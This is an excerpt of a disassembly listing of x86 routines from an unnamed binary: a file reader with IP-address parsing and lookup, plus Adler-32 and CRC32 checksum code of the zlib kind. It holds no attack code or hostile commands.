var_8 = byte ptr -8
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
push ebp
mov ebp, esp
sub esp, 0Ch
and dword ptr [esi+10h], 0
push ebx
push edi
push 2
push 0FFFFFFFDh
push dword ptr [esi]
lea ebx, [esi+14h]
mov byte ptr [ebx], 1
mov byte ptr [esi+24h], 3
call dword_9A1164 ; fseek
mov edi, dword_9A1168
add esp, 0Ch
and [ebp+var_C], 0
loc_9ACA5D: ; CODE XREF: sub_9ACA2E+66�j
push dword ptr [esi]
lea eax, [ebp+var_4]
push 3
push 1
push eax
call edi ; dword_9A1168
add esp, 10h
cmp [ebp+var_4], 0FFh
jnz short loc_9ACA7E
cmp [ebp+var_3], 0FFh
jnz short loc_9ACA7E
cmp [ebp+var_2], 0FFh
jz short loc_9ACA9B
loc_9ACA7E: ; CODE XREF: sub_9ACA2E+42�j
; sub_9ACA2E+48�j
push 1
push 0FFFFFFFCh
push dword ptr [esi]
call dword_9A1164 ; fseek
add esp, 0Ch
inc [ebp+var_C]
cmp [ebp+var_C], 14h
jl short loc_9ACA5D
jmp loc_9ACB41
; ---------------------------------------------------------------------------
loc_9ACA9B: ; CODE XREF: sub_9ACA2E+4E�j
push dword ptr [esi]
push 1
push 1
push ebx
call edi ; dword_9A1168
mov al, [ebx]
add esp, 10h
cmp al, 6Ah
jl short loc_9ACAB1
sub al, 69h
mov [ebx], al
loc_9ACAB1: ; CODE XREF: sub_9ACA2E+7D�j
mov al, [ebx]
cmp al, 7
jnz short loc_9ACACB
push 4
call dword_9A11BC ; malloc
mov [esi+10h], eax
pop ecx
mov dword ptr [eax], 0FED260h
jmp short loc_9ACB41
; ---------------------------------------------------------------------------
loc_9ACACB: ; CODE XREF: sub_9ACA2E+87�j
cmp al, 3
jnz short loc_9ACAE3
push 4
call dword_9A11BC ; malloc
mov [esi+10h], eax
pop ecx
mov dword ptr [eax], 0F42400h
jmp short loc_9ACB41
; ---------------------------------------------------------------------------
loc_9ACAE3: ; CODE XREF: sub_9ACA2E+9F�j
cmp al, 6
jz short loc_9ACAF7
cmp al, 2
jz short loc_9ACAF7
cmp al, 5
jz short loc_9ACAF7
cmp al, 4
jz short loc_9ACAF7
cmp al, 9
jnz short loc_9ACB41
loc_9ACAF7: ; CODE XREF: sub_9ACA2E+B7�j
; sub_9ACA2E+BB�j ...
push 4
call dword_9A11BC ; malloc
mov [esi+10h], eax
and dword ptr [eax], 0
push dword ptr [esi]
lea eax, [ebp+var_8]
push 1
push 3
push eax
call edi ; dword_9A1168
add esp, 14h
xor edx, edx
mov [ebp+var_C], edx
loc_9ACB19: ; CODE XREF: sub_9ACA2E+103�j
movzx edi, [ebp+edx+var_8]
mov ecx, [ebp+var_C]
mov eax, [esi+10h]
add [ebp+var_C], 8
shl edi, cl
add [eax], edi
inc edx
cmp [ebp+var_C], 18h
jl short loc_9ACB19
mov al, [ebx]
cmp al, 5
jz short loc_9ACB3D
cmp al, 4
jnz short loc_9ACB41
loc_9ACB3D: ; CODE XREF: sub_9ACA2E+109�j
mov byte ptr [esi+24h], 4
loc_9ACB41: ; CODE XREF: sub_9ACA2E+68�j
; sub_9ACA2E+9B�j ...
mov bl, [ebx]
cmp bl, 1
jz short loc_9ACB57
cmp bl, 8
jz short loc_9ACB57
cmp bl, 0Ah
jz short loc_9ACB57
cmp bl, 0Ch
jnz short loc_9ACB69
loc_9ACB57: ; CODE XREF: sub_9ACA2E+118�j
; sub_9ACA2E+11D�j ...
push 4
call dword_9A11BC ; malloc
mov [esi+10h], eax
pop ecx
mov dword ptr [eax], 0FFFF00h
loc_9ACB69: ; CODE XREF: sub_9ACA2E+127�j
pop edi
pop ebx
leave
retn
sub_9ACA2E endp
; =============== S U B R O U T I N E =======================================
sub_9ACB6D proc near ; CODE XREF: sub_9ACEB4+1F�p
push ebx
push esi
mov esi, eax
movsx ecx, byte ptr [esi]
push edi
push 3
xor eax, eax
xor edx, edx
test ecx, ecx
pop ebx
jz short loc_9ACBBD
mov edi, 0FFh
loc_9ACB85: ; CODE XREF: sub_9ACB6D+3F�j
inc esi
cmp ecx, 2Eh
jnz short loc_9ACB99
cmp edx, edi
ja short loc_9ACBBD
shl eax, 8
add eax, edx
dec ebx
xor edx, edx
jmp short loc_9ACBA7
; ---------------------------------------------------------------------------
loc_9ACB99: ; CODE XREF: sub_9ACB6D+1C�j
sub ecx, 30h
cmp ecx, 9
ja short loc_9ACBBD
lea edx, [edx+edx*4]
lea edx, [ecx+edx*2]
loc_9ACBA7: ; CODE XREF: sub_9ACB6D+2A�j
movsx ecx, byte ptr [esi]
test ecx, ecx
jnz short loc_9ACB85
cmp edx, edi
ja short loc_9ACBBD
test ebx, ebx
jnz short loc_9ACBBD
shl eax, 8
add eax, edx
jmp short loc_9ACBBF
; ---------------------------------------------------------------------------
loc_9ACBBD: ; CODE XREF: sub_9ACB6D+11�j
; sub_9ACB6D+20�j ...
xor eax, eax
loc_9ACBBF: ; CODE XREF: sub_9ACB6D+4E�j
pop edi
pop esi
pop ebx
retn
sub_9ACB6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ACBC3 proc near ; CODE XREF: sub_9ACEB4+25�p
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [edi+8]
neg esi
sbb esi, esi
lea eax, [ebp+var_C]
not esi
and esi, eax
xor eax, eax
mov [ebp+var_4], 1Fh
loc_9ACBE2: ; CODE XREF: sub_9ACBC3+E9�j
mov ecx, [edi+8]
test ecx, ecx
jnz short loc_9ACC19
cmp [edi+0Ch], ecx
jnz short loc_9ACC19
push ecx
movsx ecx, byte ptr [edi+24h]
imul ecx, eax
shl ecx, 1
push ecx
push dword ptr [edi]
call dword_9A1164 ; fseek
push dword ptr [edi]
movsx eax, byte ptr [edi+24h]
push 2
push eax
lea eax, [ebp+var_C]
push eax
call dword_9A1168 ; fread
add esp, 1Ch
jmp short loc_9ACC36
; ---------------------------------------------------------------------------
loc_9ACC19: ; CODE XREF: sub_9ACBC3+24�j
; sub_9ACBC3+29�j
mov esi, [edi+0Ch]
test esi, esi
jnz short loc_9ACC2C
movsx edx, byte ptr [edi+24h]
imul edx, eax
lea esi, [ecx+edx*2]
jmp short loc_9ACC36
; ---------------------------------------------------------------------------
loc_9ACC2C: ; CODE XREF: sub_9ACBC3+5B�j
movsx ecx, byte ptr [edi+24h]
imul ecx, eax
lea esi, [esi+ecx*2]
loc_9ACC36: ; CODE XREF: sub_9ACBC3+54�j
; sub_9ACBC3+67�j
mov ecx, [ebp+var_4]
xor eax, eax
inc eax
shl eax, cl
test [ebp+arg_0], eax
mov al, [edi+24h]
jz short loc_9ACC78
cmp al, 3
jnz short loc_9ACC62
movzx eax, byte ptr [esi+5]
movzx ecx, byte ptr [esi+4]
shl eax, 8
add eax, ecx
movzx ecx, byte ptr [esi+3]
loc_9ACC5B: ; CODE XREF: sub_9ACBC3+C9�j
shl eax, 8
add eax, ecx
jmp short loc_9ACCA2
; ---------------------------------------------------------------------------
loc_9ACC62: ; CODE XREF: sub_9ACBC3+85�j
movsx ecx, al
lea edx, [esi+ecx*2]
xor eax, eax
loc_9ACC6A: ; CODE XREF: sub_9ACBC3+B1�j
dec edx
movzx ebx, byte ptr [edx]
shl eax, 8
add eax, ebx
dec ecx
jnz short loc_9ACC6A
jmp short loc_9ACCA2
; ---------------------------------------------------------------------------
loc_9ACC78: ; CODE XREF: sub_9ACBC3+81�j
cmp al, 3
jnz short loc_9ACC8E
movzx eax, byte ptr [esi+2]
movzx ecx, byte ptr [esi+1]
shl eax, 8
add eax, ecx
movzx ecx, byte ptr [esi]
jmp short loc_9ACC5B
; ---------------------------------------------------------------------------
loc_9ACC8E: ; CODE XREF: sub_9ACBC3+B7�j
movsx ecx, al
lea edx, [ecx+esi]
xor eax, eax
loc_9ACC96: ; CODE XREF: sub_9ACBC3+DD�j
dec edx
movzx ebx, byte ptr [edx]
shl eax, 8
add eax, ebx
dec ecx
jnz short loc_9ACC96
loc_9ACCA2: ; CODE XREF: sub_9ACBC3+9D�j
; sub_9ACBC3+B3�j
mov ecx, [edi+10h]
cmp eax, [ecx]
jnb short loc_9ACCB8
dec [ebp+var_4]
jns loc_9ACBE2
xor eax, eax
loc_9ACCB4: ; CODE XREF: sub_9ACBC3+FE�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9ACCB8: ; CODE XREF: sub_9ACBC3+E4�j
push 20h
pop ecx
sub ecx, [ebp+var_4]
mov [edi+30h], ecx
jmp short loc_9ACCB4
sub_9ACBC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ACCC3 proc near ; CODE XREF: sub_9AC45B+18�p
var_24 = byte ptr -24h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, dword_9A11BC
push esi
push 38h
call ebx ; dword_9A11BC
mov esi, eax
test esi, esi
pop ecx
jz loc_9ACE55
push edi
push [ebp+arg_0]
call sub_9B322E ; strlen
mov edi, eax
inc edi
push edi
call ebx ; dword_9A11BC
test eax, eax
pop ecx
pop ecx
mov [esi+4], eax
jnz short loc_9ACD07
push esi
call dword_9A11D0 ; free
loc_9ACCFF: ; CODE XREF: sub_9ACCC3+103�j
pop ecx
loc_9ACD00: ; CODE XREF: sub_9ACCC3+186�j
xor eax, eax
jmp loc_9ACE54
; ---------------------------------------------------------------------------
loc_9ACD07: ; CODE XREF: sub_9ACCC3+33�j
push edi
push [ebp+arg_0]
push eax
call dword_9A11E0 ; strncpy
push offset dword_9A3DFC
push [ebp+arg_0]
call dword_9A1170 ; fopen
add esp, 14h
test eax, eax
mov [esi], eax
jz loc_9ACDB7
test byte ptr [ebp+arg_4], 9
mov edi, dword_9A1168
jz short loc_9ACD97
lea ecx, [ebp+var_24]
push ecx
push eax
call dword_9A11A0 ; _fileno
pop ecx
push eax
call dword_9A11A4 ; _fstat
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_9ACDB7
test byte ptr [ebp+arg_4], 8
mov eax, [ebp+var_8]
mov [esi+18h], eax
mov eax, [ebp+var_10]
mov [esi+20h], eax
jnz short loc_9ACDD5
push [ebp+var_10]
call ebx ; dword_9A11BC
test eax, eax
pop ecx
mov [esi+8], eax
jz short loc_9ACDD5
push dword ptr [esi]
push [ebp+var_10]
push 1
push eax
call edi ; dword_9A1168
add esp, 10h
cmp eax, [ebp+var_10]
jz short loc_9ACDD5
push dword ptr [esi+8]
mov edi, dword_9A11D0
call edi ; dword_9A11D0
push dword ptr [esi+4]
jmp loc_9ACE41
; ---------------------------------------------------------------------------
loc_9ACD97: ; CODE XREF: sub_9ACCC3+74�j
test byte ptr [ebp+arg_4], 2
jz short loc_9ACDD1
lea ecx, [ebp+var_24]
push ecx
push eax
call dword_9A11A0 ; _fileno
pop ecx
push eax
call dword_9A11A4 ; _fstat
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_9ACDCB
loc_9ACDB7: ; CODE XREF: sub_9ACCC3+64�j
; sub_9ACCC3+8E�j
push dword ptr [esi+4]
mov edi, dword_9A11D0
call edi ; dword_9A11D0
push esi
call edi ; dword_9A11D0
pop ecx
jmp loc_9ACCFF
; ---------------------------------------------------------------------------
loc_9ACDCB: ; CODE XREF: sub_9ACCC3+F2�j
mov eax, [ebp+var_8]
mov [esi+18h], eax
loc_9ACDD1: ; CODE XREF: sub_9ACCC3+D8�j
and dword ptr [esi+8], 0
loc_9ACDD5: ; CODE XREF: sub_9ACCC3+A0�j
; sub_9ACCC3+AD�j ...
mov eax, [ebp+arg_4]
and dword ptr [esi+28h], 0
mov [esi+1Ch], eax
call sub_9ACA2E
test byte ptr [ebp+arg_4], 4
jz short loc_9ACE4E
movsx eax, byte ptr [esi+24h]
mov ecx, [esi+10h]
imul eax, [ecx]
shl eax, 1
push eax
call ebx ; dword_9A11BC
test eax, eax
pop ecx
mov [esi+0Ch], eax
jz short loc_9ACE52
push 0
push 0
push dword ptr [esi]
call dword_9A1164 ; fseek
mov ebx, [esi+10h]
movsx eax, byte ptr [esi+24h]
push dword ptr [esi]
mov ecx, ebx
imul eax, [ecx]
shl eax, 1
push eax
push 1
push dword ptr [esi+0Ch]
call edi ; dword_9A1168
movsx ecx, byte ptr [esi+24h]
imul ecx, [ebx]
shl ecx, 1
add esp, 1Ch
cmp eax, ecx
jz short loc_9ACE52
mov edi, dword_9A11D0
push ebx
call edi ; dword_9A11D0
push dword ptr [esi+0Ch]
loc_9ACE41: ; CODE XREF: sub_9ACCC3+CF�j
call edi ; dword_9A11D0
push esi
call edi ; dword_9A11D0
add esp, 0Ch
jmp loc_9ACD00
; ---------------------------------------------------------------------------
loc_9ACE4E: ; CODE XREF: sub_9ACCC3+125�j
and dword ptr [esi+0Ch], 0
loc_9ACE52: ; CODE XREF: sub_9ACCC3+13C�j
; sub_9ACCC3+170�j
mov eax, esi
loc_9ACE54: ; CODE XREF: sub_9ACCC3+3F�j
pop edi
loc_9ACE55: ; CODE XREF: sub_9ACCC3+17�j
pop esi
pop ebx
leave
retn
sub_9ACCC3 endp
; =============== S U B R O U T I N E =======================================
sub_9ACE59 proc near ; CODE XREF: sub_9AC45B+33�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_9ACEB2
mov eax, [esi]
test eax, eax
jz short loc_9ACE70
push eax
call dword_9A1174 ; fclose
pop ecx
loc_9ACE70: ; CODE XREF: sub_9ACE59+D�j
mov eax, [esi+8]
test eax, eax
push edi
mov edi, dword_9A11D0
jz short loc_9ACE8C
test byte ptr [esi+1Ch], 8
jnz short loc_9ACE88
push eax
call edi ; dword_9A11D0
pop ecx
loc_9ACE88: ; CODE XREF: sub_9ACE59+29�j
and dword ptr [esi+8], 0
loc_9ACE8C: ; CODE XREF: sub_9ACE59+23�j
mov eax, [esi+0Ch]
test eax, eax
jz short loc_9ACE97
push eax
call edi ; dword_9A11D0
pop ecx
loc_9ACE97: ; CODE XREF: sub_9ACE59+38�j
mov eax, [esi+4]
test eax, eax
jz short loc_9ACEA2
push eax
call edi ; dword_9A11D0
pop ecx
loc_9ACEA2: ; CODE XREF: sub_9ACE59+43�j
mov eax, [esi+10h]
test eax, eax
jz short loc_9ACEAD
push eax
call edi ; dword_9A11D0
pop ecx
loc_9ACEAD: ; CODE XREF: sub_9ACE59+4E�j
push esi
call edi ; dword_9A11D0
pop ecx
pop edi
loc_9ACEB2: ; CODE XREF: sub_9ACE59+7�j
pop esi
retn
sub_9ACE59 endp
; =============== S U B R O U T I N E =======================================
sub_9ACEB4 proc near ; CODE XREF: sub_9AC45B+27�p
; sub_9AC747+6B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_4], 0
push edi
jz short loc_9ACEF1
mov edi, [esp+4+arg_0]
mov al, [edi+14h]
cmp al, 1
jz short loc_9ACECF
cmp al, 8
jz short loc_9ACECF
cmp al, 0Ah
jnz short loc_9ACEF1
loc_9ACECF: ; CODE XREF: sub_9ACEB4+11�j
; sub_9ACEB4+15�j
mov eax, [esp+4+arg_4]
call sub_9ACB6D
push eax
call sub_9ACBC3
sub eax, 0FFFF00h
test eax, eax
pop ecx
jle short loc_9ACEF1
lea eax, dword_9A3EB0[eax+eax*2]
pop edi
retn
; ---------------------------------------------------------------------------
loc_9ACEF1: ; CODE XREF: sub_9ACEB4+6�j
; sub_9ACEB4+19�j ...
xor eax, eax
pop edi
retn
sub_9ACEB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ACEF5 proc near ; CODE XREF: sub_9AD6B5+D6�p
; sub_9AE1BD+168�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push esi
mov esi, [ebp+arg_0]
push edi
xor eax, eax
mov edi, esi
inc eax
shr edi, 10h
and esi, 0FFFFh
cmp ebx, eax
jnz short loc_9ACF37
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
add esi, eax
mov eax, 0FFF1h
cmp esi, eax
jb short loc_9ACF26
sub esi, eax
loc_9ACF26: ; CODE XREF: sub_9ACEF5+2D�j
add edi, esi
cmp edi, eax
jb loc_9AD10A
sub edi, eax
jmp loc_9AD10A
; ---------------------------------------------------------------------------
loc_9ACF37: ; CODE XREF: sub_9ACEF5+1C�j
mov ecx, [ebp+arg_4]
test ecx, ecx
jz loc_9AD111
cmp ebx, 10h
jnb short loc_9ACF6E
test ebx, ebx
jz short loc_9ACF56
loc_9ACF4B: ; CODE XREF: sub_9ACEF5+5F�j
movzx eax, byte ptr [ecx]
add esi, eax
inc ecx
add edi, esi
dec ebx
jnz short loc_9ACF4B
loc_9ACF56: ; CODE XREF: sub_9ACEF5+54�j
mov ecx, 0FFF1h
cmp esi, ecx
jb short loc_9ACF61
sub esi, ecx
loc_9ACF61: ; CODE XREF: sub_9ACEF5+68�j
mov eax, edi
xor edx, edx
div ecx
mov eax, edx
jmp loc_9AD10C
; ---------------------------------------------------------------------------
loc_9ACF6E: ; CODE XREF: sub_9ACEF5+50�j
cmp ebx, 15B0h
jb loc_9AD042
mov eax, ebx
mov ebx, 15B0h
xor edx, edx
div ebx
mov ebx, [ebp+arg_8]
mov [ebp+arg_0], eax
loc_9ACF8B: ; CODE XREF: sub_9ACEF5+147�j
sub ebx, 15B0h
mov eax, 15Bh
loc_9ACF96: ; CODE XREF: sub_9ACEF5+124�j
movzx edx, byte ptr [ecx]
add esi, edx
movzx edx, byte ptr [ecx+1]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+2]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+3]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+4]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+5]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+6]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+7]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+8]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+9]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+0Ah]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+0Bh]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+0Ch]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+0Dh]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+0Eh]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+0Fh]
add edi, esi
add esi, edx
add edi, esi
add ecx, 10h
dec eax
jnz loc_9ACF96
mov eax, esi
xor edx, edx
mov esi, 0FFF1h
div esi
mov eax, edi
mov edi, 0FFF1h
mov esi, edx
xor edx, edx
div edi
dec [ebp+arg_0]
mov edi, edx
jnz loc_9ACF8B
loc_9AD042: ; CODE XREF: sub_9ACEF5+7F�j
test ebx, ebx
jz loc_9AD10A
cmp ebx, 10h
jb loc_9AD0E4
mov eax, ebx
shr eax, 4
loc_9AD058: ; CODE XREF: sub_9ACEF5+1E9�j
movzx edx, byte ptr [ecx]
add esi, edx
movzx edx, byte ptr [ecx+1]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+2]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+3]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+4]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+5]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+6]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+7]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+8]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+9]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+0Ah]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+0Bh]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+0Ch]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+0Dh]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+0Eh]
add edi, esi
add esi, edx
movzx edx, byte ptr [ecx+0Fh]
add edi, esi
add esi, edx
sub ebx, 10h
add edi, esi
add ecx, 10h
dec eax
jnz loc_9AD058
loc_9AD0E4: ; CODE XREF: sub_9ACEF5+158�j
test ebx, ebx
jz short loc_9AD0F3
loc_9AD0E8: ; CODE XREF: sub_9ACEF5+1FC�j
movzx eax, byte ptr [ecx]
add esi, eax
inc ecx
add edi, esi
dec ebx
jnz short loc_9AD0E8
loc_9AD0F3: ; CODE XREF: sub_9ACEF5+1F1�j
mov eax, esi
mov ecx, 0FFF1h
xor edx, edx
mov esi, ecx
div esi
mov eax, edi
mov esi, edx
xor edx, edx
div ecx
mov edi, edx
loc_9AD10A: ; CODE XREF: sub_9ACEF5+35�j
; sub_9ACEF5+3D�j ...
mov eax, edi
loc_9AD10C: ; CODE XREF: sub_9ACEF5+74�j
shl eax, 10h
or eax, esi
loc_9AD111: ; CODE XREF: sub_9ACEF5+47�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_9ACEF5 endp
; =============== S U B R O U T I N E =======================================
sub_9AD116 proc near ; CODE XREF: sub_9AD46B+13�p
var_4 = dword ptr -4
push ecx
push edi
xor edi, edi
cmp dword_9B549C, edi
jz loc_9AD213
push ebx
push ebp
push esi
xor esi, esi
mov dword_9B549C, edi
xor eax, eax
loc_9AD133: ; CODE XREF: sub_9AD116+35�j
xor edx, edx
mov dl, byte_9A41B4[eax]
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
or esi, edx
inc eax
cmp eax, 0Eh
jb short loc_9AD133
xor ecx, ecx
loc_9AD14F: ; CODE XREF: sub_9AD116+5B�j
push 8
mov eax, ecx
pop edx
loc_9AD154: ; CODE XREF: sub_9AD116+4B�j
test al, 1
jz short loc_9AD15E
shr eax, 1
xor eax, esi
jmp short loc_9AD160
; ---------------------------------------------------------------------------
loc_9AD15E: ; CODE XREF: sub_9AD116+40�j
shr eax, 1
loc_9AD160: ; CODE XREF: sub_9AD116+46�j
dec edx
jnz short loc_9AD154
mov dword_9B5858[ecx*4], eax
inc ecx
cmp ecx, 100h
jl short loc_9AD14F
mov edi, offset dword_9B6858
mov ecx, 0FF00h
loc_9AD17D: ; CODE XREF: sub_9AD116+E8�j
mov eax, [edi-1000h]
mov esi, eax
and esi, ecx
mov ebx, eax
shl ebx, 10h
add esi, ebx
mov edx, eax
shr edx, 8
shl esi, 8
mov ebx, edx
and ebx, ecx
add esi, ebx
mov ebx, eax
shr ebx, 18h
add esi, ebx
mov [edi], esi
lea esi, [edi+400h]
mov [esp+14h+var_4], 3
loc_9AD1B3: ; CODE XREF: sub_9AD116+DD�j
and eax, 0FFh
mov eax, dword_9B5858[eax*4]
xor eax, edx
mov ebx, eax
and ebx, ecx
mov ebp, eax
shl ebp, 10h
add ebx, ebp
mov edx, eax
shr edx, 8
shl ebx, 8
mov ebp, edx
and ebp, ecx
add ebx, ebp
mov ebp, eax
shr ebp, 18h
add ebx, ebp
mov [esi-1000h], eax
mov [esi], ebx
add esi, 400h
dec [esp+14h+var_4]
jnz short loc_9AD1B3
add edi, 4
cmp edi, offset dword_9B6C58
jl loc_9AD17D
pop esi
pop ebp
mov dword_9B5498, 0
pop ebx
jmp short loc_9AD21B
; ---------------------------------------------------------------------------
loc_9AD213: ; CODE XREF: sub_9AD116+A�j
; sub_9AD116+103�j
cmp dword_9B5498, edi
jnz short loc_9AD213
loc_9AD21B: ; CODE XREF: sub_9AD116+FB�j
pop edi
pop ecx
retn
sub_9AD116 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AD21E proc near ; CODE XREF: sub_9AD46B+24�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push ebx
push esi
push edi
not eax
mov edx, 0FFh
jz short loc_9AD250
loc_9AD233: ; CODE XREF: sub_9AD21E+30�j
test cl, 3
jz short loc_9AD250
xor ebx, ebx
mov bl, [ecx]
xor ebx, eax
and ebx, edx
shr eax, 8
xor eax, dword_9B5858[ebx*4]
inc ecx
dec [ebp+arg_0]
jnz short loc_9AD233
loc_9AD250: ; CODE XREF: sub_9AD21E+13�j
; sub_9AD21E+18�j
cmp [ebp+arg_0], 20h
push 4
mov esi, ecx
pop edi
jb loc_9AD3FD
mov ecx, [ebp+arg_0]
shr ecx, 5
mov [ebp+var_8], ecx
loc_9AD268: ; CODE XREF: sub_9AD21E+1D9�j
xor eax, [esi]
add esi, edi
mov [ebp+var_4], eax
movzx ecx, byte ptr [ebp+var_4+2]
mov ecx, dword_9B5C58[ecx*4]
movzx ebx, ah
xor ecx, dword_9B6058[ebx*4]
mov ebx, eax
shr ebx, 18h
xor ecx, dword_9B5858[ebx*4]
and eax, edx
xor ecx, dword_9B6458[eax*4]
xor ecx, [esi]
add esi, edi
mov [ebp+var_4], ecx
movzx eax, byte ptr [ebp+var_4+2]
mov eax, dword_9B5C58[eax*4]
movzx ebx, ch
xor eax, dword_9B6058[ebx*4]
mov ebx, ecx
shr ebx, 18h
xor eax, dword_9B5858[ebx*4]
and ecx, edx
xor eax, dword_9B6458[ecx*4]
xor eax, [esi]
add esi, edi
mov [ebp+var_4], eax
movzx ecx, byte ptr [ebp+var_4+2]
mov ecx, dword_9B5C58[ecx*4]
movzx ebx, ah
xor ecx, dword_9B6058[ebx*4]
mov ebx, eax
shr ebx, 18h
xor ecx, dword_9B5858[ebx*4]
and eax, edx
xor ecx, dword_9B6458[eax*4]
xor ecx, [esi]
add esi, edi
mov [ebp+var_4], ecx
movzx eax, byte ptr [ebp+var_4+2]
mov eax, dword_9B5C58[eax*4]
movzx ebx, ch
xor eax, dword_9B6058[ebx*4]
mov ebx, ecx
shr ebx, 18h
xor eax, dword_9B5858[ebx*4]
and ecx, edx
xor eax, dword_9B6458[ecx*4]
xor eax, [esi]
add esi, edi
mov [ebp+var_4], eax
movzx ecx, byte ptr [ebp+var_4+2]
mov ecx, dword_9B5C58[ecx*4]
movzx ebx, ah
xor ecx, dword_9B6058[ebx*4]
mov ebx, eax
shr ebx, 18h
xor ecx, dword_9B5858[ebx*4]
and eax, edx
xor ecx, dword_9B6458[eax*4]
xor ecx, [esi]
add esi, edi
mov [ebp+var_4], ecx
movzx eax, byte ptr [ebp+var_4+2]
mov eax, dword_9B5C58[eax*4]
movzx ebx, ch
xor eax, dword_9B6058[ebx*4]
mov ebx, ecx
shr ebx, 18h
xor eax, dword_9B5858[ebx*4]
and ecx, edx
xor eax, dword_9B6458[ecx*4]
xor eax, [esi]
add esi, edi
mov [ebp+var_4], eax
movzx ecx, byte ptr [ebp+var_4+2]
mov ecx, dword_9B5C58[ecx*4]
movzx ebx, ah
xor ecx, dword_9B6058[ebx*4]
mov ebx, eax
shr ebx, 18h
xor ecx, dword_9B5858[ebx*4]
sub [ebp+arg_0], 20h
and eax, edx
xor ecx, dword_9B6458[eax*4]
xor ecx, [esi]
add esi, edi
mov [ebp+var_4], ecx
movzx eax, byte ptr [ebp+var_4+2]
mov eax, dword_9B5C58[eax*4]
movzx ebx, ch
xor eax, dword_9B6058[ebx*4]
mov ebx, ecx
shr ebx, 18h
xor eax, dword_9B5858[ebx*4]
and ecx, edx
xor eax, dword_9B6458[ecx*4]
dec [ebp+var_8]
jnz loc_9AD268
loc_9AD3FD: ; CODE XREF: sub_9AD21E+3B�j
cmp [ebp+arg_0], edi
jb short loc_9AD446
mov ecx, [ebp+arg_0]
shr ecx, 2
mov [ebp+var_8], ecx
loc_9AD40B: ; CODE XREF: sub_9AD21E+226�j
xor eax, [esi]
sub [ebp+arg_0], edi
mov [ebp+var_4], eax
movzx ecx, byte ptr [ebp+var_4+2]
mov ecx, dword_9B5C58[ecx*4]
movzx ebx, ah
xor ecx, dword_9B6058[ebx*4]
mov ebx, eax
shr ebx, 18h
xor ecx, dword_9B5858[ebx*4]
and eax, edx
xor ecx, dword_9B6458[eax*4]
add esi, edi
dec [ebp+var_8]
mov eax, ecx
jnz short loc_9AD40B
loc_9AD446: ; CODE XREF: sub_9AD21E+1E2�j
cmp [ebp+arg_0], 0
jz short loc_9AD464
loc_9AD44C: ; CODE XREF: sub_9AD21E+244�j
xor ecx, ecx
mov cl, [esi]
xor ecx, eax
and ecx, edx
shr eax, 8
xor eax, dword_9B5858[ecx*4]
inc esi
dec [ebp+arg_0]
jnz short loc_9AD44C
loc_9AD464: ; CODE XREF: sub_9AD21E+22C�j
pop edi
pop esi
not eax
pop ebx
leave
retn
sub_9AD21E endp
; =============== S U B R O U T I N E =======================================
sub_9AD46B proc near ; CODE XREF: sub_9A6A3A+73�p
; sub_9A6DB9+6A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp [esp+arg_4], 0
jnz short loc_9AD475
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_9AD475: ; CODE XREF: sub_9AD46B+5�j
cmp dword_9B5498, 0
jz short loc_9AD483
call sub_9AD116
loc_9AD483: ; CODE XREF: sub_9AD46B+11�j
push [esp+arg_8]
mov ecx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
call sub_9AD21E
pop ecx
retn
sub_9AD46B endp
; =============== S U B R O U T I N E =======================================
sub_9AD496 proc near ; CODE XREF: sub_9AD804+74�p
; sub_9AD804+B5�p ...
push esi
mov esi, eax
mov eax, [esi+1Ch]
